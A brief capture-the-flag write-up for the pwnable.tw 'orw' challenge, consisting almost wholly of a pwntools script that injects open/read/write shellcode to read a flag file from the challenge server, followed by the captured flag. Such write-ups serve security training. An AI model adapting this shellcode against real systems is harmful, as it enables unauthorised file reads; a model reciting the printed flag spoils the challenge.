[pwnable.tw] orw write-up

pwnable/pwnable.tw

ba0bab 2018. 8. 19. 00:45

from pwn import *

s = remote("chall.pwnable.tw", 10001)

context(arch='i386', os='linux')

s.recvuntil(":")

payload = shellcraft.pushstr("/home/orw/flag")

payload += shellcraft.open("esp",0,0)

payload += shellcraft.read("eax", "esp", 0xff)

payload += shellcraft.write(1,"esp", 0xff)

s.sendline(asm(payload))

s.interactive()

FLAG{sh3llc0ding_w1th_op3n_r34d_writ3}